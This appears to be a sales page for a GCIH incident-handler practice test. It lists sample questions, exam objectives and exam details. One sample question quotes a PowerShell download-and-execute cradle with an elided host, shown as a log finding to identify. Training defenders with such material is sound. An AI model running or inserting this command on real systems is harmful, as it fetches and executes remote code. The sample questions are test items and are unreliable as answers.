GCIH - GIAC Certified Incident Handler Practice Test

140 questions available

Build your confidence for GCIH - GIAC Certified Incident Handler. Practice the concepts, understand the answers, and strengthen your knowledge one question at a time.

Try a sample question
Try 5 free questions
No account needed. A free account includes 20 questions for this exam.
Certification exam
106 Exam questions
4 hours Time Limit
Your practice
140 Practice questions
2 hours 20 minutes Practice Time
Try 5 free questions
No account needed. A free account includes 20 questions for this exam.
The bar to clear 73 Published passing score for this certification.
Official objectives from GIAC
GIAC140 practice questions
Blueprint verifiedChecked against GIAC official objectivesMetadata verified 2026-09-06How we verify

Exam overview and details

The GIAC Certified Incident Handler (GCIH) certification validates a professional's ability to detect, respond to, and contain cybersecurity incidents effectively. This practice test is meticulously designed to mirror the rigor and scope of the official GCIH exam, covering the core domains of the GIAC Incident Handling and Response Process. Candidates will be tested on their practical knowledge of exploitation and post-exploitation techniques, including common attack vectors and adversary tactics. The test also delves into critical areas such as malware analysis and defense, where you must demonstrate proficiency in identifying malicious code and implementing protective measures. Scanning and reconnaissance methodologies are covered to ensure you can recognize the early stages of an attack, while web application attacks focus on the most prevalent vulnerabilities like SQL injection and cross-site scripting. Achieving the GCIH certification is a powerful career accelerator, signaling to employers that you possess the hands-on skills necessary to manage the full lifecycle of an incident-from preparation and identification through containment, eradication, and recovery. This practice test serves as a definitive benchmark, helping you identify knowledge gaps and build the confidence required to pass the exam on your first attempt, ultimately positioning you as a trusted expert in incident response and cybersecurity operations.

Sample Questions

Choose an answer and explore the explanation to see how practice works.

Domain 4: Endpoint Attacks

DPAPI (Data Protection API) is used by Windows to protect what category of data?

Domain 3: Network-Based Attacks

Ettercap is primarily used for which class of attack?

Domain 1: Incident Handling Process

An organization wants to define an incident severity matrix. Which two-axis approach is MOST commonly recommended by NIST SP 800-61r2?

Domain 5: Web Application Attacks

DOM-based XSS differs from reflected XSS because the malicious payload:

Domain 7: Malware Analysis Basics

An IR team discovers PowerShell logs containing iex (New-Object Net.WebClient).DownloadString('http://...'). What technique is the adversary using?

Career Opportunities & Salary

Median salary: $129,180– Information Security Analysts

Source: BLS Occupational Employment and Wage Statistics, May 2025 -- Information Security Analysts (SOC 15-1212), US national. Occupation median, not a certification salary. (2025)

Information Security Analysts

Exam insights and study advice

In the current threat landscape, organizations are not asking if they will be breached, but when. The GCIH certification directly addresses this reality by validating that you possess the advanced, hands-on skills to handle sophisticated attacks. Earning this credential demonstrates to employers and peers that you can think like an attacker to better defend your organization. It is widely recognized as a gold standard for incident handlers, security operations center (SOC) analysts, and penetration testers. This certification often leads to significant career advancement, including roles such as Senior Incident Responder, Security Engineer, or Cyber Threat Hunter, and is frequently listed as a preferred or required qualification for high-level security positions. By mastering the content in this practice test, you are not just preparing for an exam; you are building the practical expertise that commands higher salaries, greater responsibility, and industry-wide respect.

What this exam covers

01Attacking Passwords

Topics

  • Demonstrate a detailed understanding of how to conduct password attacks

Learning objectives

  • Demonstrate a detailed understanding of how to conduct password attacks

02Detecting Evasive and Post-Exploitation Techniques

Topics

  • Identify and defend against an attacker already in an environment, discover methods used to establish persistence, hide their presence, and achieve actions on objectives

Learning objectives

  • Identify and defend against an attacker already in an environment, discover methods used to establish persistence, hide their presence, and achieve actions on objectives

03Detecting Exploitation and Covert Communications Tools

Topics

  • Demonstrate an understanding of how to identify and defend against the use of exploitation tools such as Metasploit and covert communications tools such as netcat

Learning objectives

  • Demonstrate an understanding of how to identify and defend against the use of exploitation tools such as Metasploit and covert communications tools such as netcat

04Endpoint Attack and Pivoting

Topics

  • Demonstrate an understanding of how to identify and defend against endpoint specific attacks and pivoting in an environment

Learning objectives

  • Demonstrate an understanding of how to identify and defend against endpoint specific attacks and pivoting in an environment

05Exploiting Insecure Web Application References

Topics

  • Demonstrate an understanding of common methods for exploiting insecure web application references

Learning objectives

  • Demonstrate an understanding of common methods for exploiting insecure web application references

06Incident Response and Cyber Investigation

Topics

  • Demonstrate an understanding of the PICERL and DAIR incident handling processes and incident response challenges

Learning objectives

  • Demonstrate an understanding of the PICERL and DAIR incident handling processes and incident response challenges

07Integrating LLMs with Offensive Operations

Topics

  • Demonstrate an understanding of LLM prompt processing, risks, common attack methods, and defend against AI specific attacks in modern environments

Learning objectives

  • Demonstrate an understanding of LLM prompt processing, risks, common attack methods, and defend against AI specific attacks in modern environments

08Malware and AI Assisted Investigations

Topics

  • Demonstrate an understanding of the steps necessary to perform basic malware analysis and understand how AI can be used to augment investigative efforts

Learning objectives

  • Demonstrate an understanding of the steps necessary to perform basic malware analysis and understand how AI can be used to augment investigative efforts

09Network and Log Investigations

Topics

  • Demonstrate an understanding of the steps necessary to perform effective investigations of network and log data

Learning objectives

  • Demonstrate an understanding of the steps necessary to perform effective investigations of network and log data

10Scanning and Mapping

Topics

  • Demonstrate an understanding of how to discover and map networks and hosts, reveal services and vulnerabilities, and identify and defend against scanning

Learning objectives

  • Demonstrate an understanding of how to discover and map networks and hosts, reveal services and vulnerabilities, and identify and defend against scanning

11Securing Credentials and Data in the Cloud

Topics

  • Demonstrate an understanding of how to identify, defend against, and mitigate password attacks and insecure storage in cloud-based environments

Learning objectives

  • Demonstrate an understanding of how to identify, defend against, and mitigate password attacks and insecure storage in cloud-based environments

12SMB Security

Topics

  • Demonstrate an understanding of SMB features, vulnerabilities, how to discover and access shares, and how to secure the service

Learning objectives

  • Demonstrate an understanding of SMB features, vulnerabilities, how to discover and access shares, and how to secure the service

13Understanding Passwords

Topics

  • Identify password hashes, understand password weaknesses, and secure passwords

Learning objectives

  • Identify password hashes, understand password weaknesses, and secure passwords

14Web Application API Attacks

Topics

  • Demonstrate the basics of interacting with and abusing access to web APIs

Learning objectives

  • Demonstrate the basics of interacting with and abusing access to web APIs

15Web Application Injection Attacks

Topics

  • Demonstrate an understanding of common web application injection attacks

Learning objectives

  • Demonstrate an understanding of common web application injection attacks

Exam Details GCIH | $949 USD | 4 hours

Exam Code GCIH
Vendor GIAC
Exam Cost $949 USD
Passing Score 73
Time Limit 4 hours
Exam questions 106
Question Types Multiple choice (100%)
Retake Policy Two free practice tests are included with each exam registration. Candidates have a 4-month window to take the exam after registration. Retake fees apply after the first failed attempt. Contact GIAC for specific retake waiting periods.
Exam Format Multiple Choice
Online Proctoring Available

Frequently Asked Questions

What is the primary difference between the GCIH and other GIAC certifications like the GSEC or GPEN?

How much hands-on experience is recommended before attempting the GCIH exam?

Does the GCIH certification expire, and how do I maintain it?

What are the most common topics tested in the 'Exploitation and Post-Exploitation' domain?

How does the GCIH exam test the 'Incident Handling and Response Process'?